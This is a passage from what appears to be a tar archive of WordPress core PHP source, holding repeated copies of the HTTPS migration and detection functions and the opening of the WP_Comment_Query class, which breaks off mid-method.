* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605175105-20260621081205.php 0000666 00000011205 15224151220 0013350 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260606142425.php 0000666 00000013341 15224151220 0011760 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260607013104.php 0000666 00000011205 15224151220 0011760 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-comment-query.php 0000666 00000137244 15224151220 0011622 0 ustar 00 <?php
/**
* Comment API: WP_Comment_Query class
*
* @package WordPress
* @subpackage Comments
* @since 4.4.0
*/
/**
* Core class used for querying comments.
*
* @since 3.1.0
*
* @see WP_Comment_Query::__construct() for accepted arguments.
*/
#[AllowDynamicProperties]
class WP_Comment_Query {
/**
* SQL for database query.
*
* @since 4.0.1
* @var string
*/
public $request;
/**
* Metadata query container
*
* @since 3.5.0
* @var WP_Meta_Query A meta query instance.
*/
public $meta_query = false;
/**
* Metadata query clauses.
*
* @since 4.4.0
* @var array
*/
protected $meta_query_clauses;
/**
* SQL query clauses.
*
* @since 4.4.0
* @var array
*/
protected $sql_clauses = array(
'select' => '',
'from' => '',
'where' => array(),
'groupby' => '',
'orderby' => '',
'limits' => '',
);
/**
* SQL WHERE clause.
*
* Stored after the {@see 'comments_clauses'} filter is run on the compiled WHERE sub-clauses.
*
* @since 4.4.2
* @var string
*/
protected $filtered_where_clause;
/**
* Date query container
*
* @since 3.7.0
* @var WP_Date_Query A date query instance.
*/
public $date_query = false;
/**
* Query vars set by the user.
*
* @since 3.1.0
* @var array
*/
public $query_vars;
/**
* Default values for query vars.
*
* @since 4.2.0
* @var array
*/
public $query_var_defaults;
/**
* List of comments located by the query.
*
* @since 4.0.0
* @var int[]|WP_Comment[]
*/
public $comments;
/**
* The amount of found comments for the current query.
*
* @since 4.4.0
* @var int
*/
public $found_comments = 0;
/**
* The number of pages.
*
* @since 4.4.0
* @var int
*/
public $max_num_pages = 0;
/**
* Make private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( 'get_search_sql' === $name ) {
return $this->get_search_sql( ...$arguments );
}
return false;
}
/**
* Constructor.
*
* Sets up the comment query, based on the query vars passed.
*
* @since 4.2.0
* @since 4.4.0 `$parent__in` and `$parent__not_in` were added.
* @since 4.4.0 Order by `comment__in` was added. `$update_comment_meta_cache`, `$no_found_rows`,
* `$hierarchical`, and `$update_comment_post_cache` were added.
* @since 4.5.0 Introduced the `$author_url` argument.
* @since 4.6.0 Introduced the `$cache_domain` argument.
* @since 4.9.0 Introduced the `$paged` argument.
* @since 5.1.0 Introduced the `$meta_compare_key` argument.
* @since 5.3.0 Introduced the `$meta_type_key` argument.
*
* @param string|array $query {
* Optional. Array or query string of comment query parameters. Default empty.
*
* @type string $author_email Comment author email address. Default empty.
* @type string $author_url Comment author URL. Default empty.
* @type int[] $author__in Array of author IDs to include comments for. Default empty.
* @type int[] $author__not_in Array of author IDs to exclude comments for. Default empty.
* @type int[] $comment__in Array of comment IDs to include. Default empty.
* @type int[] $comment__not_in Array of comment IDs to exclude. Default empty.
* @type bool $count Whether to return a comment count (true) or array of
* comment objects (false). Default false.
* @type array $date_query Date query clauses to limit comments by. See WP_Date_Query.
* Default null.
* @type string $fields Comment fields to return. Accepts 'ids' for comment IDs
* only or empty for all fields. Default empty.
* @type array $include_unapproved Array of IDs or email addresses of users whose unapproved
* comments will be returned by the query regardless of
* `$status`. Default empty.
* @type int $karma Karma score to retrieve matching comments for.
* Default empty.
* @type string|string[] $meta_key Meta key or keys to filter by.
* @type string|string[] $meta_value Meta value or values to filter by.
* @type string $meta_compare MySQL operator used for comparing the meta value.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_compare_key MySQL operator used for comparing the meta key.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type MySQL data type that the meta_value column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type_key MySQL data type that the meta_key column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type array $meta_query An associative array of WP_Meta_Query arguments.
* See WP_Meta_Query::__construct() for accepted values.
* @type int $number Maximum number of comments to retrieve.
* Default empty (no limit).
* @type int $paged When used with `$number`, defines the page of results to return.
* When used with `$offset`, `$offset` takes precedence. Default 1.
* @type int $offset Number of comments to offset the query. Used to build
* LIMIT clause. Default 0.
* @type bool $no_found_rows Whether to disable the `SQL_CALC_FOUND_ROWS` query.
* Default: true.
* @type string|array $orderby Comment status or array of statuses. To use 'meta_value'
* or 'meta_value_num', `$meta_key` must also be defined.
* To sort by a specific `$meta_query` clause, use that
* clause's array key. Accepts:
* - 'comment_agent'
* - 'comment_approved'
* - 'comment_author'
* - 'comment_author_email'
* - 'comment_author_IP'
* - 'comment_author_url'
* - 'comment_content'
* - 'comment_date'
* - 'comment_date_gmt'
* - 'comment_ID'
* - 'comment_karma'
* - 'comment_parent'
* - 'comment_post_ID'
* - 'comment_type'
* - 'user_id'
* - 'comment__in'
* - 'meta_value'
* - 'meta_value_num'
* - The value of `$meta_key`
* - The array keys of `$meta_query`
* - false, an empty array, or 'none' to disable `ORDER BY` clause.
* Default: 'comment_date_gmt'.
* @type string $order How to order retrieved comments. Accepts 'ASC', 'DESC'.
* Default: 'DESC'.
* @type int $parent Parent ID of comment to retrieve children of.
* Default empty.
* @type int[] $parent__in Array of parent IDs of comments to retrieve children for.
* Default empty.
* @type int[] $parent__not_in Array of parent IDs of comments *not* to retrieve
* children for. Default empty.
* @type int[] $post_author__in Array of author IDs to retrieve comments for.
* Default empty.
* @type int[] $post_author__not_in Array of author IDs *not* to retrieve comments for.
* Default empty.
* @type int $post_id Limit results to those affiliated with a given post ID.
* Default 0.
* @type int[] $post__in Array of post IDs to include affiliated comments for.
* Default empty.
* @type int[] $post__not_in Array of post IDs to exclude affiliated comments for.
* Default empty.
* @type int $post_author Post author ID to limit results by. Default empty.
* @type string|string[] $post_status Post status or array of post statuses to retrieve
* affiliated comments for. Pass 'any' to match any value.
* Default empty.
* @type string|string[] $post_type Post type or array of post types to retrieve affiliated
* comments for. Pass 'any' to match any value. Default empty.
* @type string $post_name Post name to retrieve affiliated comments for.
* Default empty.
* @type int $post_parent Post parent ID to retrieve affiliated comments for.
* Default empty.
* @type string $search Search term(s) to retrieve matching comments for.
* Default empty.
* @type string|array $status Comment statuses to limit results by. Accepts an array
* or space/comma-separated list of 'hold' (`comment_status=0`),
* 'approve' (`comment_status=1`), 'all', or a custom
* comment status. Default 'all'.
* @type string|string[] $type Include comments of a given type, or array of types.
* Accepts 'comment', 'pings' (includes 'pingback' and
* 'trackback'), or any custom type string. Default empty.
* @type string[] $type__in Include comments from a given array of comment types.
* Default empty.
* @type string[] $type__not_in Exclude comments from a given array of comment types.
* Default empty.
* @type int $user_id Include comments for a specific user ID. Default empty.
* @type bool|string $hierarchical Whether to include comment descendants in the results.
* - 'threaded' returns a tree, with each comment's children
* stored in a `children` property on the `WP_Comment` object.
* - 'flat' returns a flat array of found comments plus
* their children.
* - Boolean `false` leaves out descendants.
* The parameter is ignored (forced to `false`) when
* `$fields` is 'ids' or 'counts'. Accepts 'threaded',
* 'flat', or false. Default: false.
* @type string $cache_domain Unique cache key to be produced when this query is stored in
* an object cache. Default is 'core'.
* @type bool $update_comment_meta_cache Whether to prime the metadata cache for found comments.
* Default true.
* @type bool $update_comment_post_cache Whether to prime the cache for comment posts.
* Default false.
* }
*/
public function __construct( $query = '' ) {
$this->query_var_defaults = array(
'author_email' => '',
'author_url' => '',
'author__in' => '',
'author__not_in' => '',
'include_unapproved' => '',
'fields' => '',
'ID' => '',
'comment__in' => '',
'comment__not_in' => '',
'karma' => '',
'number' => '',
'offset' => '',
'no_found_rows' => true,
'orderby' => '',
'order' => 'DESC',
'paged' => 1,
'parent' => '',
'parent__in' => '',
'parent__not_in' => '',
'post_author__in' => '',
'post_author__not_in' => '',
'post_ID' => '',
'post_id' => 0,
'post__in' => '',
'post__not_in' => '',
'post_author' => '',
'post_name' => '',
'post_parent' => '',
'post_status' => '',
'post_type' => '',
'status' => 'all',
'type' => '',
'type__in' => '',
'type__not_in' => '',
'user_id' => '',
'search' => '',
'count' => false,
'meta_key' => '',
'meta_value' => '',
'meta_query' => '',
'date_query' => null, // See WP_Date_Query.
'hierarchical' => false,
'cache_domain' => 'core',
'update_comment_meta_cache' => true,
'update_comment_post_cache' => false,
);
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Parse arguments passed to the comment query with default query parameters.
*
* @since 4.2.0 Extracted from WP_Comment_Query::query().
*
* @param string|array $query WP_Comment_Query arguments. See WP_Comment_Query::__construct() for accepted arguments.
*/
public function parse_query( $query = '' ) {
if ( empty( $query ) ) {
$query = $this->query_vars;
}
$this->query_vars = wp_parse_args( $query, $this->query_var_defaults );
/**
* Fires after the comment query vars have been parsed.
*
* @since 4.2.0
*
* @param WP_Comment_Query $query The WP_Comment_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_comment_query', array( &$this ) );
}
/**
* Sets up the WordPress query for retrieving comments.
*
* @since 3.1.0
* @since 4.1.0 Introduced 'comment__in', 'comment__not_in', 'post_author__in',
* 'post_author__not_in', 'author__in', 'author__not_in', 'post__in',
* 'post__not_in', 'include_unapproved', 'type__in', and 'type__not_in'
* arguments to $query_vars.
* @since 4.2.0 Moved parsing to WP_Comment_Query::parse_query().
*
* @param string|array $query Array or URL query string of parameters.
* @return array|int List of comments, or number of comments when 'count' is passed as a query var.
*/
public function query( $query ) {
$this->query_vars = wp_parse_args( $query );
return $this->get_comments();
}
/**
* Get a list of comments matching the query vars.
*
* @since 4.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|int[]|WP_Comment[] List of comments or number of found comments if `$count` argument is true.
*/
public function get_comments() {
global $wpdb;
$this->parse_query();
// Parse meta query.
$this->meta_query = new WP_Meta_Query();
$this->meta_query->parse_query_vars( $this->query_vars );
/**
* Fires before comments are retrieved.
*
* @since 3.1.0
*
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
do_action_ref_array( 'pre_get_comments', array( &$this ) );
// Reparse query vars, in case they were modified in a 'pre_get_comments' callback.
$this->meta_query->parse_query_vars( $this->query_vars );
if ( ! empty( $this->meta_query->queries ) ) {
$this->meta_query_clauses = $this->meta_query->get_sql( 'comment', $wpdb->comments, 'comment_ID', $this );
}
$comment_data = null;
/**
* Filters the comments data before the query takes place.
*
* Return a non-null value to bypass WordPress' default comment queries.
*
* The expected return type from this filter depends on the value passed
* in the request query vars:
* - When `$this->query_vars['count']` is set, the filter should return
* the comment count as an integer.
* - When `'ids' === $this->query_vars['fields']`, the filter should return
* an array of comment IDs.
* - Otherwise the filter should return an array of WP_Comment objects.
*
* Note that if the filter returns an array of comment data, it will be assigned
* to the `comments` property of the current WP_Comment_Query instance.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_comments` and `max_num_pages` properties of the WP_Comment_Query object,
* passed to the filter by reference. If WP_Comment_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 5.3.0
* @since 5.6.0 The returned array of comment data is assigned to the `comments` property
* of the current WP_Comment_Query instance.
*
* @param array|int|null $comment_data Return an array of comment data to short-circuit WP's comment query,
* the comment count as an integer if `$this->query_vars['count']` is set,
* or null to allow WP to run its normal queries.
* @param WP_Comment_Query $query The WP_Comment_Query instance, passed by reference.
*/
$comment_data = apply_filters_ref_array( 'comments_pre_query', array( $comment_data, &$this ) );
if ( null !== $comment_data ) {
if ( is_array( $comment_data ) && ! $this->query_vars['count'] ) {
$this->comments = $comment_data;
}
return $comment_data;
}
/*
* Only use the args defined in the query_var_defaults to compute the key,
* but ignore 'fields', 'update_comment_meta_cache', 'update_comment_post_cache' which does not affect query results.
*/
$_args = wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) );
unset( $_args['fields'], $_args['update_comment_meta_cache'], $_args['update_comment_post_cache'] );
$key = md5( serialize( $_args ) );
$last_changed = wp_cache_get_last_changed( 'comment' );
$cache_key = "get_comments:$key";
$cache_value = wp_cache_get_salted( $cache_key, 'comment-queries', $last_changed );
if ( false === $cache_value ) {
$comment_ids = $this->get_comment_ids();
if ( $comment_ids ) {
$this->set_found_comments();
}
$cache_value = array(
'comment_ids' => $comment_ids,
'found_comments' => $this->found_comments,
);
wp_cache_set_salted( $cache_key, $cache_value, 'comment-queries', $last_changed );
} else {
$comment_ids = $cache_value['comment_ids'];
$this->found_comments = $cache_value['found_comments'];
}
if ( $this->found_comments && $this->query_vars['number'] ) {
$this->max_num_pages = (int) ceil( $this->found_comments / $this->query_vars['number'] );
}
// If querying for a count only, there's nothing more to do.
if ( $this->query_vars['count'] ) {
// $comment_ids is actually a count in this case.
return (int) $comment_ids;
}
$comment_ids = array_map( 'intval', $comment_ids );
if ( $this->query_vars['update_comment_meta_cache'] ) {
wp_lazyload_comment_meta( $comment_ids );
}
if ( 'ids' === $this->query_vars['fields'] ) {
$this->comments = $comment_ids;
return $this->comments;
}
_prime_comment_caches( $comment_ids, false );
// Fetch full comment objects from the primed cache.
$_comments = array();
foreach ( $comment_ids as $comment_id ) {
$_comment = get_comment( $comment_id );
if ( $_comment ) {
$_comments[] = $_comment;
}
}
// Prime comment post caches.
if ( $this->query_vars['update_comment_post_cache'] ) {
$comment_post_ids = array();
foreach ( $_comments as $_comment ) {
$comment_post_ids[] = $_comment->comment_post_ID;
}
_prime_post_caches( $comment_post_ids, false, false );
}
/**
* Filters the comment query results.
*
* @since 3.1.0
*
* @param WP_Comment[] $_comments An array of comments.
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
$_comments = apply_filters_ref_array( 'the_comments', array( $_comments, &$this ) );
// Convert to WP_Comment instances.
$comments = array_map( 'get_comment', $_comments );
if ( $this->query_vars['hierarchical'] ) {
$comments = $this->fill_descendants( $comments );
}
$this->comments = $comments;
return $this->comments;
}
/**
* Used internally to get a list of comment IDs matching the query vars.
*
* @since 4.4.0
* @since 6.9.0 Excludes the 'note' comment type, unless 'all' or the 'note' types are requested.
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|array A single count of comment IDs if a count query. An array of comment IDs if a full query.
*/
protected function get_comment_ids() {
global $wpdb;
// Assemble clauses related to 'comment_approved'.
$approved_clauses = array();
// 'status' accepts an array or a comma-separated string.
$status_clauses = array();
$statuses = wp_parse_list( $this->query_vars['status'] );
// Empty 'status' should be interpreted as 'all'.
if ( empty( $statuses ) ) {
$statuses = array( 'all' );
}
// 'any' overrides other statuses.
if ( ! in_array( 'any', $statuses, true ) ) {
foreach ( $statuses as $status ) {
switch ( $status ) {
case 'hold':
$status_clauses[] = "comment_approved = '0'";
break;
case 'approve':
$status_clauses[] = "comment_approved = '1'";
break;
case 'all':
case '':
$status_clauses[] = "( comment_approved = '0' OR comment_approved = '1' )";
break;
default:
$status_clauses[] = $wpdb->prepare( 'comment_approved = %s', $status );
break;
}
}
$approved_clauses[] = '( ' . implode( ' OR ', $status_clauses ) . ' )';
}
// User IDs or emails whose unapproved comments are included, regardless of $status.
if ( ! empty( $this->query_vars['include_unapproved'] ) ) {
$include_unapproved = wp_parse_list( $this->query_vars['include_unapproved'] );
foreach ( $include_unapproved as $unapproved_identifier ) {
// Numeric values are assumed to be user IDs.
if ( is_numeric( $unapproved_identifier ) ) {
$approved_clauses[] = $wpdb->prepare( "( user_id = %d AND comment_approved = '0' )", $unapproved_identifier );
} else {
// Otherwise we match against email addresses.
if ( ! empty( $_GET['unapproved'] ) && ! empty( $_GET['moderation-hash'] ) ) {
// Only include requested comment.
$approved_clauses[] = $wpdb->prepare( "( comment_author_email = %s AND comment_approved = '0' AND {$wpdb->comments}.comment_ID = %d )", $unapproved_identifier, (int) $_GET['unapproved'] );
} else {
// Include all of the author's unapproved comments.
$approved_clauses[] = $wpdb->prepare( "( comment_author_email = %s AND comment_approved = '0' )", $unapproved_identifier );
}
}
}
}
// Collapse comment_approved clauses into a single OR-separated clause.
if ( ! empty( $approved_clauses ) ) {
if ( 1 === count( $approved_clauses ) ) {
$this->sql_clauses['where']['approved'] = $approved_clauses[0];
} else {
$this->sql_clauses['where']['approved'] = '( ' . implode( ' OR ', $approved_clauses ) . ' )';
}
}
$order = ( 'ASC' === strtoupper( $this->query_vars['order'] ) ) ? 'ASC' : 'DESC';
// Disable ORDER BY with 'none', an empty array, or boolean false.
if ( in_array( $this->query_vars['orderby'], array( 'none', array(), false ), true ) ) {
$orderby = '';
} elseif ( ! empty( $this->query_vars['orderby'] ) ) {
$ordersby = is_array( $this->query_vars['orderby'] ) ?
$this->query_vars['orderby'] :
preg_split( '/[,\s]/', $this->query_vars['orderby'] );
$orderby_array = array();
$found_orderby_comment_id = false;
foreach ( $ordersby as $_key => $_value ) {
if ( ! $_value ) {
continue;
}
if ( is_int( $_key ) ) {
$_orderby = $_value;
$_order = $order;
} else {
$_orderby = $_key;
$_order = $_value;
}
if ( ! $found_orderby_comment_id && in_array( $_orderby, array( 'comment_ID', 'comment__in' ), true ) ) {
$found_orderby_comment_id = true;
}
$parsed = $this->parse_orderby( $_orderby );
if ( ! $parsed ) {
continue;
}
if ( 'comment__in' === $_orderby ) {
$orderby_array[] = $parsed;
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $_order );
}
// If no valid clauses were found, order by comment_date_gmt.
